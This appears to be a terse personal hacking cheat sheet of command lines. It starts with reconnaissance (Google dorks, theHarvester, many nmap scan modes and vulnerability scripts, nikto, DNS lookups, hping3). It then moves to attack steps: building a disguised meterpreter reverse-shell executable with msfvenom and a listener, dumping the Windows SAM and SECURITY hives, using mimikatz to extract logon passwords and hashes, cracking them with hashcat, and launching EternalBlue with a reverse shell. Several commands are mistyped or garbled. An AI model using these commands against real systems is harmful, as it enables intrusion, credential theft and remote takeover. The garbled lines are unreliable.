allintitle: "index of/admin" inurl: allintitle: "index of/admin"
theHarvester -d cisco.com -b google
RECON-NG: workspaces create plu
arp scan: nmap -PR nmap -PA
nmap -P 1-200 nmap --top-port 2000
Scan all port: nmap -p-
SYN Scan: nmap -sS
FIN Scan: nmap -sF
ACK Scan: nmap -sA
Scan no flag: nmap -sN
XMAS Scan: nmap -sX
Pn: Treat all hosts as online -- skip host discovery nmap -Pn
nmap -A -Pn
nmap -script=http-waf-fingerprint : detect waf lbd : detect load balancing whatweb : scan web info nikto : enum web dir
profiling with nmap: nmap -A
nmap -sS: TCP SYN port scan (Default)
nmap --script nmap-vulners -sV -p80 : Scan vuln
nmap --script vulscan --script-args vulnscandb=exploitdb.csv -sV -p80 : Scan vuln with exploitdb
link cheatsheet: https://academy.ehacking.net/courses/recipe-2-active-information-gathering-enumeration-the-right-way/lectures/27146478
msf5 use auxiliary/scanner/http/dir_listing msf5 use auxiliary/scanner/http/file_dir
Dns enum: host -t ns host -t mx host
nslookup -type=mx pluralsight.com nslookup -type=soa pluralsight.com nslookup -type=any pluralsight.com
hping3 -F -c 3-p 79 -s 5150 192.168.0.25 -f: flag -c: count -p: port -s: source port
lsof -i | grep LISTEN lsof -i tcp ss -tl ss -lu
metagofill - passive recon fcrackzip - crack zip password digicert ssltool( website) - looking cert ssl
nmap --script=http-enum urbandictionary.com nmap --script=http-php-version urbandictionary.com
nmap -P -oG - | nikto -h -h: host
iconv -f utf8 -t utf15 hh.txt> jj.txt
str.encode("base64","strict")
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.30 LPORT= -f exe -a x64 -0 /root/Desktop/salari.exe
msfconsole use exploit/multi/handler set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST set LPORT RUN
dir in downloads cmd:
reg save hklm\sam wind10-sam.hiv reg save hklm\sec wind10-sec.hiv
- hklm: hkey local machine
download mimikatz and copy 2 file .hiv to sub folder of minikit x64
Run mimikats by admin
privilege::debug log reg-sam-sec.log sekurlsa::logonpasswords
token::elevate
lsadump::sam win10-sam.hiv win10-sec.hiv in kali, run hashcat to get a plain text password
msf5> search enternalblue use .. set payload windows/x65/meterpreter/reverse_tcp options set RHOSTS,PORT,LHOST set smbuser set smbpass